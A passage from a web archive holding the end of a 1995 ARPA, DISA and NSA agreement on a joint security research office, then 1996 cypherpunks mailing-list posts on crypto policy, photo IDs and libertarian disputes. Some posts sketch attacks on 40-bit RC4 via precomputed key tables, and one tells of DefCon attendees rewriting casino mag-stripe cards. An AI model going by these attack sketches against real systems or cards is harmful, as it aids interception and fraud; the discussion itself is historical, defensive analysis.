initiatives.  ARPA's role in fostering the development of advanced
information technologies now requires close attention to the security
of these technologies.<P>

NSA's security technology plan envisions maximum use of commercial
technology for sensitive but unclassified applications, and, to the
extent possible, for classified applications as well.  A key element
of this plan is the transfer of highly reliable government-developed
technology and techniques to industry for integration into commercial
off-the-shelf products, making quality-tested security components
available not only to DoD but to the full spectrum of government and
private sector users as well.  ARPA is working with its contractor
community to fully integrate security into next generation computing
technologies being developed in all its programs, and working with the
the research community to develop strategic relationships with
industry so that industry will develop modular security technologies
with the capability of exchanging appropriate elements to meet various
levels of  required security.<P>

NSA and ARPA now share a strong  interest in promoting the development
and integration of security technology for advanced information
systems applications.  The challenge at hand is to guide the efforts
of the two agencies in a way that optimizes use of the limited
research funds available and maximizes support to DISA in building the
Defense Information Infrastructure.<P>

NSA acts as the U.S. Government's focal point for cryptography,
telecommunications security, and information systems security for
national security systems.  It conducts, approves, or endorses
research and development of techniques and equipment to secure
national security systems.  NSA reviews and approves all standards,
techniques, systems, and equipment related to the security of national
security systems.  NSA's primary focus is to provide information
systems security products, services, and standards in the near term to
help its customers protect classified and national security-related
sensitive but unclassified information.  It develops and assesses new
security technology in the areas of cryptography, technical security,
and authentication technology; endorses cryptographic systems
protecting national security information; develops infrastructure
support technologies; evaluates and rates trusted computer and network
products; and provides information security standards for DoD.  Much
of the work in these areas is conducted in a classified environment,
and the balancing of national security and law enforcement equities
has been a significant constraint.<P>

ARPA's mission is to perform research and development that helps the 
Department of Defense to maintain U.S. technological superiority over
potential adversaries.  At the core of the ARPA mission is the goal to
develop and demonstrate revolutionary technologies that will
fundamentally enhance the capability of the military.  ARPA's role in
fostering the development of advanced computing and communications
technologies for use by the DoD requires that long term solutions to
increasing the security of these systems be developed.  ARPA is
interested in commercial or dual-use technology, and usually
technology that provides revolutionary rather than evolutionary
enhancements to capabilities. ARPA is working with industry and
academia to develop technologies that will enable industry to provide
system design methodologies and secure computer, operating system, and
networking technologies.  NSA and ARPA research interests have been
converging in these areas, particularly with regard to protocol
development involving key, token, and certificate exchanges and
processes.<P>

One of the key differences between ARPA's work and NSA's is that
ARPA's is performed in unclassified environments, often in university
settings.  This enables ARPA to access talent and pursue research
strategies normally closed to NSA due to security considerations.
Another difference is that while NSA's research is generally built
around developing and using specific cryptographic algorithms, ARPA's
approach is to pursue solutions that are independent of algorithm used
and allow for modularly replaceable cryptography.  ARPA will, to the
greatest extent possible, allow its contractor community to use
cryptography developed at NSA, and needs solutions from NSA on an
expedited basis so as not to hold up its research program.<P>

DISA functions as the Department of Defense's information utility.
Its requirements for information systems security extend beyond
confidentiality to include protection of data from tampering or
destruction and assurance that data exchanges are originated and
received by valid participants.  DISA is the first line of defense for
information warfare, and needs quality technology for detecting and
responding to network penetrations.  The growing vulnerability of the
Defense information Infrastructure to unauthorized access and use,
demonstrated in the penetration of hundreds of DoD computer systems
during 1994, makes delivery of enabling security technologies to DISA
a matter of urgency.

<H3>The Information Systems Security Research Joint Technology
Office</H3>

This MOA authorizes the ISSR-JTO as a joint undertaking of ARPA, DISA,
and NSA.  It will perform those functions jointly agreed to by these
agencies.  Each agency shall delegate to the ISSO-JTO such authority
and responsibility as is necessary to carry out its agreed functions.
Participation in the joint program does not relieve ARPA, DISA, or NSA
of their respective individual charter responsibilities, or diminish
their respective authorities.<P>

A Joint Management Plan will be developed to provide a detailed
definition of the focus, objectives, operation, and costs of the Joint
Technology Office.  The ISSR-JTO will be jointly staffed by ARPA,
DISA, and NSA, with respective staffing levels to be agreed upon by
the three parties.  Employees assigned to the JTO will remain on the
billets of their respective agency.  Personnel support for employees
assigned to the JTO will be provided by their home organization.  The
ISSR-JTO will be housed within both ARPA and NSA, except as agreed
otherwise by the three parties.  To the greatest extent possible, it
will function as a virtual office, using electronic connectivity to
minimize the need for constant physical co-location.  Physical
security support will be provided by the party responsible for the
specific facilities occupied.  Assignment of the ISSR-JTO Director,
Deputy Director, and management of other office elements will be made
by mutual agreement among the Directors of ARPA, DISA, and NSA upon
recommendation of their staffs.<P>

<H3>Functions</H3>

By mutual agreement of ARPA, DISA, and NSA, the ISSR-JTO will perform
the following joint functions:
<OL>
<LI>Review and coordinate all Information System Security Research
programs at ARPA and NSA to ensure that there is no unnecessary
duplication, that the programs are technically sound, that they are
focused on customer requirements where available, and that long term
research is aimed at revolutionary increases in DoD security
capabilities.

<LI>Support ARPA and NSA in evaluating proposals and managing projects
arising from their information systems security efforts, and maintain
a channel for the exchange of technical expertise to support their
information systems security research programs.

<LI>Provide long range strategic planning for information systems
security research.  Provide concepts of future architectures which
include security as an integral component and a road map for the
products that need to be developed to fit the architectures, taking
into account anticipated DoD information systems security research
needs for command and control, intelligence, support functions, and
electronic commerce.  The long range security program will explore
technologies which extend security research boundaries.

<LI>Develop measures of the effectiveness of the information systems
security research programs in reducing vulnerabilities.

<LI>Work with DISA, other defense organizations, academic, and
industrial organizations to take new information systems security
research concepts and apply them to selected prototype systems and
testbed projects.

<LI>Encourage the U.S. industrial base to develop commercial products
with built-in security to be used in DoD systems.  Develop alliances
with industry to raise the level of security in all U.S. systems.
Bring together private sector leaders in information systems security
research to advise the JTO and build consensus for the resulting
programs.

<LI>Identify areas for which standards need to be developed for
information systems security.

<LI>Facilitate the availability and use of NSA certified cryptography
within information systems security research programs.

<LI>Proactively provide a coherent, integrated joint vision of the
program in internal and public communications.
</OL>
<H3>Program Oversight and Revisions</H3>

The Director, ISSR-JTO, has a joint reporting responsibility to the
Directors of ARPA, DISA, and NSA.  The Director, ISSR-JTO, will
conduct a formal Program Status Review for the Directors of ARPA,
DISA, and NSA on an annual basis, and will submit mid-year progress
reports between formal reviews.  Specific reporting procedures and
practices of the JTO to ARPA, DISA, and NSA will be detailed in the
Joint Technology Management Plan.  This MOA will be reviewed at least
annually, and may be revised at any time, based on the mutual consent
of ARPA, DISA, and NSA, to assure the effective execution of the joint
initiative.  Any of the parties may withdraw from participation in the
MOA upon six months written notice.  The MOA is effective 2 April,
1995.<P>


<IMG
SRC="http://www.ito.darpa.mil/ResearchAreas/Information_Survivability/sigs4.gif"
ALT="Signatures of Dr. Gary L. Denman, Director ARPA; LtGen Albert J.
Edmonds, Director, DISA; VADM John M. McConnell, Director, NSA; Dr.
Anita K. Jones, Director, DDR&E; Emmett Paige, Jr., Assistant
Secretary of Defense for Command, Control, Communications and Intelligence"><P>

<P>

<address>
<HR>
<A
HREF="http://www.ito.darpa.mil/ResearchAreas/Information_Survivability.html">Return
to Information Survivability Page</A> <BR>
Direct comments concerning this WWW site to: <A
HREF="mailto:Webmaster@ito.darpa.mil">Webmaster@ito.darpa.mil</A></address>
</BODY>
</HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 1 Aug 1996 16:36:25 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "adjust your attitude with their billy club"
In-Reply-To: <ae24e2ee02021004242f@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960801015918.23502E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> When the local cops adjust my attitude with a billy club for dressing like
> a hippie and lounging around in a public place

   I am a defender of your right to not be harrassed by legal-definition 
nuisances, not a fashion cop.  I gave up on trying to clean up the 
unwashed masses, a long time ago.

But if your definition of "lounging" includes (say) playing your boombox as 
loud as you want in the park - then mine includes making a buck by burning 
toxic waste.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Thu, 1 Aug 1996 19:55:07 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defc
Message-ID: <2.2.32.19960801091751.006a9430@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



> Since they were speakers, could they be part of the Spot The Fed contest?

They said that every other time their comrades had come to defcon, they had
tried to come incognito, and got caught every time.  This time, they wore
FBI t-shirts, and the only response was "Hey! Where'd ya get the T-Shirt?!?".
They said "We hacked 'em from the FBI" and that was it, noone suspected... =)
//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 1 Aug 1996 16:52:38 +0800
To: John Brothers <johnbr@atl.mindspring.com>
Subject: Re: A Libertine Question
In-Reply-To: <1.5.4.32.19960731223430.006cdb98@pop.atl.mindspring.com>
Message-ID: <Pine.SV4.3.91.960801022119.23502I-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


John Brothers,

Which locality do you live in?  I've got all this toxic waste that I've 
been collecting in return for receiving large sums of money, I'd like to 
get rid of it as cheply as possible. I thought I might just burn it in a 
good  "true" libertarian neighborhood.

You don't mind, do you?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 1 Aug 1996 20:12:22 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: The "Secure" version of Netscape for Linux is *NOT*
In-Reply-To: <2.2.32.19960801033402.00fc1ab8@mail.teleport.com>
Message-ID: <32007B4F.300@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen wrote:
> 
> I just installed the "secure" version of Netscape off of the "US Only"
> download site.
> 
> Seems that it is actualy the international version and not the 128 bit version.
> 
> How many people have downloaded this version only to find that they
> downloaded something that they could have downloaded faster from a mirror
> site?  How many people have had their downloads slowed down due to people
> downloading insecure Linux versions from the US only site?
> 
> I think I have a justifiable reason to be pissed.
> 
> Another waste of my time...

  I just downloaded the tar file for linux, and it does contain
the US version.  What makes you think that you got the export
version?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Aug 1996 04:28:00 +0800
To: cypherpunks@toad.com
Subject: "An who shall guard the guardians?"
Message-ID: <ae24db790002100463bd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



The Latin maxim "And who shall guard the guardians?" has some relevance to
the headlong rush into converting the U.S. into even more of a security
state than it is now.

The investigation in Atlanta is now focussing on a rent-a-cop who may have
planted the pipe bomb and then "discovered" it. Check the usual Web news
sources for more details. Whether he is the bomber or not is not the point,
which is, "who watches the cops?"

A string of arsons up and down the north-south highways of California was
finally shown to correlate with the travels up and down those highways (at
those same times) by a Glendale arson investigator!

And cases where cops have planted evidence, drugs, and guns are almost too
much a part of our culture to even notice anymore.

My point is not that all cops are corrupt. Indeed, I suspect that they are
no more corrupt proportionately than is the general population...which is
not too reassuring to me, though.

ObClipper: "Who shall guard the guardians?" While the various Clipper
proposals have putative safeguards to limit access, think of Craig
Livingstone, a rent-a-cop the Clintons hire to work on their Enemies List.
And think of the dossiers of J. Edgar Hoover. And think of Nixon. And think
of what President Pat Buchanan would do with Government Access to Keys.

No thanks, I'll lock my own doors. I have no plans to "voluntarily escrow"
my door keys with the local cops. "Secure in one's papers and person" rings
a bell, doesn't it?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Aug 1996 04:54:13 +0800
To: cypherpunks@toad.com
Subject: Photo IDs (Re: A Libertine Question)
Message-ID: <ae24e032010210047fab@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:12 PM 7/31/96, Duncan Frissell wrote:

>was allegedly requiring *two* pieces of ID for flights.  If they are talking
>about two pieces of photo -- government-issued ID, I wonder where the 80% of
>Americans without a Passport (x the 90% of Americans who are not government
>employees) get the second piece of ID. [Is it a violation of something if
>you Heil Hitler od Sieg Heil the airline clerk when they ask to see your ID.
>It's not a threat, it's an expression of honor.]

Yeah, this "two photo IDs" is strange, given that:

a. many ordinary people have only one form of photo I.D., namely, their
driver's license (and many don't even have that)

b. terrorists and other such persons are _very_ likely to have multiple
forms of I.D., though of course not in their "true name."

Hence, the policy looks ineffectual and just a sop to public relations.

And just what is a "true name" for the purposes of this law, anyway? Birth
name? And what is that? What about people who marry, change names, etc.?
Given that there is no "standard" for photo I.D.s, will my Official
Cypherpunks Card count?

I can easily make my own photo I.D.s, or even order "fake I.D.s" from
various mail-order outlets advertising in the Usual Places. If I show up at
the airline with two photo I.D.s, one showing me to be "Security Officer
Mickey Mouse" and the other showing me to be "Mickey Mouse, Internal
Security Agency," will I be violating any laws?

--Mickey Mouse (I just changed my name--if you don't like it, FAA, fuck off)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Thu, 1 Aug 1996 04:44:16 +0800
To: cypherpunks@toad.com
Subject: Re: DESZIP
Message-ID: <199607311701.DAA23143@suburbia.net>
MIME-Version: 1.0
Content-Type: text




-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjEU4rEAAAEEAOZT252f2ULHwUYi19HzJeIg3I/Pp+goO2dbJuuaQETSh0Oi
P0HVro6G5rK7lFccU9dqjOJAZ8Ov2v8wvD+mt/auHBBJB7hDQsLlqJsJQlfXQVKd
4FWSdCiv4j6uMcdYZ95/OB8vIUP8rmW21idQZ9AvU9ZWYf1tx9iJtSs22Ap9AAUR
tARhbm9u
=jUI9
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Aug 1996 05:09:48 +0800
To: cypherpunks@toad.com
Subject: "adjust your attitude with their billy club"
Message-ID: <ae24e2ee02021004242f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:28 AM 7/31/96, Alan Horowitz wrote:

>I am a strong libertarian. Sell crack cocaine, rent your pussy to horny
>middle-aged businessmen, do any non-violent,
>non-damaging-to-others-property you want, but damn well maintain public
>order and decorum. Or I will scream to my councilman for the cops to
>adjust your attitude with their billy club.

When the local cops adjust my attitude with a billy club for dressing like
a hippie and lounging around in a public place that my taxes have helped
pay for, I'll remember that a "strong libertarian" said that he was doing
the right thing.

....

In my town, the City-State decided to crack down on the homeless by
arresting people for "giving away food" in a public park. They charged the
soup providers with various failures to have Health Department permits and
for not having a permit to operate a restaurant, pay various fees to the
City-State, and so on.

I went to a City Council meeting when this was happening (1991-2) and spoke
up in the public comment part of the meeting. I pointed out that the very
same park at which these "food criminals" were doing their dastardly deeds
in was a park at which other people and groups were cooking hot dogs and
hamburgers, ladling out bowls of chili, serving potato salad, and generally
"distributing food." All, of course, without benefit of licenses, health
inspections, OSHA inspections, and so on. I suggested arrests of the picnic
groups begin immediately, using the same exact charges used to harass the
homeless helpers.

The Council members, most of them leftist liberals, had no answer.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Thu, 1 Aug 1996 21:51:02 +0800
To: cypherpunks@toad.com
Subject: Re: Cracking RC4/40 for massive wiretapps
In-Reply-To: <199608010603.XAA19276@toad.com>
Message-ID: <4tq268$nsk@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199608010603.XAA19276@toad.com>,
Bill Stewart  <stewarts@ix.netcom.com> wrote:
> When we discussed using FPGA machines to crack RC4/40 last year,
> someone calculated the cost of cracking a message at 8 cents

That was the keylength paper.  I think their estimate is way off.

But that's ok-- I do so like the ring of ``8-cent encryption'', even
if I think the derivation is technically dubious :-)

> is whether you can speed up performance substantially by cracking
> multiple messages at once.  For instance, if you've got known plaintext,
> such as a standard header format saying "FooVoice" or "BEGIN DSA-SIGNED..",
> you can try many keys and compare them with _many_ cyphertexts,

Not with SSL.

SSL uses a random 88-bit salt which is different for every session.
This attack doesn't work.  Fun to think about, though, eh? :-)

[ Unsalted 40-bit RC4 is super-dangerous, and there are all sorts of
nasty games one can play with it.  That's why you should avoid it. ]

>                                              Also, even for
> unknown-plaintext, since key scheduling is a relatively slow part of RC4/40,
> you can split the key-schedule and the block-encryption phases, feeding
> one keyschedule output to multiple decrypt-and-compare sessions in parallel.
> So the cost per victim of cracking many sessions may be much lower.

Same deal.


Keep those ideas flowing-- one of 'em is bound to work.
-- Dave Wagner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Thu, 1 Aug 1996 20:40:15 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: FPGAs and Heat (Re: Paranoid Musings)
Message-ID: <199608010938.EAA02670@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


>At 12:42 AM 7/31/96 -0700, David Wagner wrote:
>>Those estimates assume that a single FPGA can break RC4 in hours.  I think
>>that is an extremely optimistic assumption, given the available public
>>information.  But perhaps NSA is orders of magnitude ahead of us in chip
>>design (unlikely) or orders of magnitude ahead of us in RC4 cryptanalysis
>>(and we're back to paranoid musings).
>
>>> If we assume a machine designed to break *every* message, NSA's response
>>> makes more sense.
>
>I feel like I'm leaning over backwards to defend NSA's response, an
>extremely uncomfortable position (and I could crack my skull when I fall)
>:-).  The most important issue is, what is NSA's state of the art.  If we
>accept their $1000/FPGA chip, then they are indeed at the bleeding edge,
>and suffering from the associated low chip yields.  If they are at the best
>cost-performance point for 2-3 years ago or whenever they started approving
>the export of RC4-40, then they are certainly subject to David Wagner's
>performance limits.
Sorry about mangling quotes. :(
This was about a year and a half ago.
I can't remember the name of it,  but this chip fab industry mag was
talking about how the NSA was obtaining out side help in fabricating what
was at the time a type of ram that did processing off chip in parrallel.

If the chip was basically routing the problem to different sectors and
the same sectors of ram did their own processing on different parts of the 
same problem how many powers of processing time would this increase the 
same amount of acerage?* 

* NSA term for processing. 

Side note: Wired just recently talked about IRAM or Intelligent ram, and 
how it seems to be the future of high speed computation.
PGP encrypted mail preferred.  
E-Mail me for my key.
Scott J. Schryvers <schryver@radiks.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Schryvers <schryver@radiks.net>
Date: Thu, 1 Aug 1996 21:19:20 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: New Clinton Administration Ping Policy
Message-ID: <199608011028.FAA03370@sr.radiks.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:22 PM 7/31/96 -0700, you wrote:
>
>Press release:
>
>CLINTON ADMINISTRATION FACT SHEET: U.S. PING POLICY
>(Industry, international cooperation urged)
>
The sad thing here is that I can't tell if this is a joke or not.
:(
PGP encrypted mail preferred.  
E-Mail me for my key.
Scott J. Schryvers <schryver@radiks.net>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wwoelbel@midwest.net (W.K. Woelbeling)
Date: Thu, 1 Aug 1996 23:51:33 +0800
To: cypherpunks@toad.com
Subject: crypto++ help
Message-ID: <199608011226.HAA27596@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


I recently downloaded the crypto++ class library and am having a bit of
trouble getting things to happen.  I have read the text on the
source-filter-sink concept and was able to create a DES file encryptor.
What I would like to do is use either blowfish or IDEA to encrypt a variable
length data stream.  Does anybody have experience with this library?  A
short code snippet or similar help would be appreciated.

Bill Woelbeling
wwoelbel@midwest.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 2 Aug 1996 02:34:02 +0800
To: cypherpunks@toad.com
Subject: Re: Cracking RC4/40 for massive wiretapps
In-Reply-To: <199608011151.HAA07754@unix.asb.com>
Message-ID: <199608011445.HAA06675@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


RC4 is a stream cypher, so it produces a random stream which is XOR'd
with the plaintext to produce the cyphertext (and vice versa).  With the
old SSL there were spots of known plaintext, but I don't know if that is
the case now.  If you do have some, then you can recover the output of
the cypher.

5 bytes (40 bits) of output should generally determine the key.  So you
could build a massive lookup table indexed by the output which produces
the key.  This would have 2^40 entries (indexed by output values) each
of which was 5 bytes long (key values).  This would take approximately
5K gigabyte disks plus some PC's to attach them to.  Total cost, one to
a few million dollars, perhaps a bit less if you get them wholesale!
(The task of constructing the table is left as an exercise for the
reader.)

Then given that you know output you can quickly find the key.  No
search is involved, you just go to the PC which holds the range of
output values you are interested in, and do a single disk access.

Note that the known plaintext doesn't have to be contiguous, any five
bytes will do.  With fewer known bytes you can do a similar thing but
have a list of possible keys which can generate that set of output
bytes.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 1 Aug 1996 22:34:17 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Cracking RC4/40 for massive wiretapps
Message-ID: <199608011151.HAA07754@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



Wait a minute: RC4 is an OFB cipher.  The previous plaintext has no 
effect on the ciphertext.  Hence, an attacker with shitloads of 
storage capacity can generate some initial output for each key and 
test each pre-stored key against ciphertext for possible hits.  Using 
'flaws' in the key schedule (esp. if the key is based on a password 
rather than a hash of a password) one could search for 'more likely 
keys' first.

Rob
---
No-frills sig. Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Stephenson <cts@deltanet.com>
Date: Fri, 2 Aug 1996 03:01:16 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: VISA Travel Money
In-Reply-To: <2.2.32.19960801045505.00695c6c@gonzo.wolfenet.com>
Message-ID: <3200CBB7.74DE@deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


Cerridwyn Llewyellyn wrote:
> 
> >> It's not as anonymous as cash, but it might draw a lot less
> >> attention in my circumstances.  I think it has a place in one's
> >> aresenal of privacy enchancing technologies.
> >
> >     This card has the value "written" when you "purchase" it right?
> >
> >    Any one wanna bet on how long it will take the "Hacker" Community
> >to figure out how to "refill" it? Otherwise all you have is a
> >debit card.
> 
> Interesting related story about DefCon:  for those of you who have been
> to Las Vegas, you know that many casinos have mag stripe cards that are
> issued for a variety of reasons, that are just as good as cash in the
> casino, but can't be used anywhere else.  Many use them as a sort of
> debit card for slot machines.  The story goes that a few DefCon attendies
> acquired a few of these cards from the Tropicana, and re-wrote the stripe
> to read that they had over 60,000 "points".  I guess they discovered that
> the card was re-written each time it was used.  Unfortunately for them,
> what they didn't discover was that the system also kept track on a
> computer somewhere, and the large difference between the computer's tally
> and the card's value set off numerous red flags, they found out relatively
> quickly when two Casino Security guards escorted them to the police station.
> Oops.  I can't help but wonder what would've happened if they only made
> the difference like 10 points instead of 60K?  These two people were not
> too bright, as they were staying at the Tropicana, and probably had all
> the equipment in their rooms.  If they were of age, I believe (depending
> on what they found in the room) they can each get multiple 15 year federal
> sentences.
> 
> Moral of the Story: Mag Stripe cards are never secure by themselves (the
> credit card companies mistakenly relied on security by obscurity and are
> feeling the painful effects still today), but have the potential to be secure
> if backed up by that kind of system.  However, it would only really be
> practical
> in a closed environment like a Casino.
> 
> Thus, for the sake of all the lovely banks I know and love, I hope they
> either A. choose something other than mag. stripes, or B. use them only as
> debit cards that are checked against a bank account when used.
> 
> //cerridwyn//

Those cards are not debit cards. They are used to track a players time
and money spent playing slots and other games. I have a stack of them. 
Whenever I go to the blackjack tables, I give mine to the pit boss
and he writes down the amount of money I am gambling with and time spent
at the table. 

The only thing the cards are used for is "comps". I get a free prime rib
dinner after playing for "x" amount of points. I think the case will
either get thrown out of court, or the casino will drop charges. Since
the points have no monetary value, the fraud charge probably will not
stick (if that is what they were charged with). The two hackers will
probably get a call from "Guido" reminding them never to step foot back
in Vegas.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Fri, 2 Aug 1996 03:23:54 +0800
To: cypherpunks@toad.com
Subject: algorithms for verifying U.S. IP address ...
Message-ID: <199608011606.JAA23574@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


How does one verify that an IP address is coming from a U.S. site?
How do most FTP site (e.g. those which carry crypto) determine the
origins of a connection?

It seems to me that if the NSA/DoS is serious about keeping crypto
strong for U.S. internal use, then they would help establish a
method for U.S.-only interchange of this sort of software.  It is
clear, however, that they do NOT have an interest in helping with
this identification effort as it will thwart their own efforts at
tapping U.S. (er ... oh gee ... they're NOT suppose to do that,
right?  okay, they must not be doing it then ...)

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 2 Aug 1996 04:39:35 +0800
To: Cerridwyn Llewyellyn <cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
Message-ID: <199608011621.JAA28782@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:13 PM 7/31/96 -0700, Cerridwyn Llewyellyn wrote:

>A more cynical view is that they are there to protect some of the biggest
>institutions of "organized crime" (ie: Congress, At&t, Microsoft, etc) who
>are ripping people off on a daily basis from the other organizations who
>refuse to play by their rules.

Speaking of AT+T, as I recall one of the incidents which preceded the 
introduction of Clipper was the news that AT+T was going to introduce an 
encrypted telephone using DES as the encryption algorithm.  According to the 
story, AT+T was "bought off" by the US government.   I haven't looked into 
that for a couple of years, but if we're looking for co-conspirators that 
would be a good place to start.  

Also:  Clipper was fabbed by VLSI Technology.  A few pointed inquiries might 
work wonders here.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 2 Aug 1996 02:14:07 +0800
To: cypherpunks@toad.com
Subject: Re: Let's Say "No!" to Single, World Versions of Software
In-Reply-To: <Pine.LNX.3.95.960731154700.578A-100000@gak>
Message-ID: <v03007812ae266148e5d8@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:16 PM -0400 7/31/96, Tom Weinstein wrote:
> The only thing they can revoke is their permission to provide it for
> download over the internet.  They can't revoke our permission to sell
> it in stores or via snail mail.

Which, of course, would kill your business.



Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Aug 1996 04:25:24 +0800
To: cypherpunks@toad.com
Subject: Re: FPGAs and Heat (Re: Paranoid Musings)
Message-ID: <ae262b5b050210046227@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:39 AM 8/1/96, Scott Schryvers wrote:

>This was about a year and a half ago.
>I can't remember the name of it,  but this chip fab industry mag was
>talking about how the NSA was obtaining out side help in fabricating what
>was at the time a type of ram that did processing off chip in parrallel.

This was a company in Bowie, Maryland, closely linked with the NSA and with
the "supercomputer centers." The idea of "processing in memory" has been
explored by various companies.

By the way, on the subject of using FPGAs for computers, here's a URL I
found that's interesting:

http://www.io.com/~guccione/HW_list.html

>Side note: Wired just recently talked about IRAM or Intelligent ram, and
>how it seems to be the future of high speed computation.

Side side note: I worked on Intel's "iRAM," standing for "intelligent RAM,"
in 1980-81. It found little market success. The idea of changing the
architecture of RAM bubbles up every few years, but has not yet succeeded
(except in some video-specific applications).

Cautionary Note: Bubble memories, laser pantography, integrated injection
logic, e-beam addressed memory, neural nets, Josephson junctions....

When you've watched the industry for enough years you'll learn to cast a
jaundiced eye on pronouncements that a technology is the Next Big Thing.
The above list--which covers only chips, not similar Next Big Things in
software--is a list of some of the things "Wired" would've hyped, had it
been published back then.

Most such announcements come out public relations departments at major
public labs, or from over-enthusiastic VCs. Or from claims made in papers
presented at the International Solid State Circuits Conference and similar
conferences. Reporters seeking stories then push the story.

The usual form of the press release goes something like this:

"The discovery of foobartronic switches may mean chips that are ten times
faster and one hundred times denser. Researchers say the foobartronic
revolution could reshape the entire industry..."

Few of the advances reported in "Wired" will ever see the light of day....
Some will, of course, but it's useful to remember that most of it is hype.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
